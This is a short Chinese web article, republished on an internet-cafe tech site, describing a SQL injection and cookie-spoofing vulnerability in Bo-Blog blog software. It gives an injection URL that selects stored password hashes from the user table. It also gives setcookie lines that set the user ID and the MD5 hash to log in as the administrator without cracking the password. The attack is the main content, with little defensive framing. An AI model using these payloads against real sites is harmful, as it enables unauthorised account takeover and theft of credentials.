天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

boblog注入后COOKIE欺骗漏洞

2011-3-13未知未知
影响版本:boblog最新
官方网站:http://www.bo-blog.com//
漏洞类型:COOKIE欺骗
漏洞描述:
代码
index.php代码
if ($go) @list($job, $itemid)=@explode('_', basename($go));
原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
更何况 存在注入漏洞的
`category` in ({$all_needed_cates})");
不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
COOKIES欺骗漏洞很简单
假如某牛真的注入成功得到MD5密码不用去跑MD5了
直接
setcookie ('userid', '1',);
setcookie ('userpsw', 'md5密文', );
既可了……


本文来源:未知 作者:未知

声明
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。文章是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。 Email:support@txwb.com,系统开号,技术支持,服务联系微信:_WX_1_本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行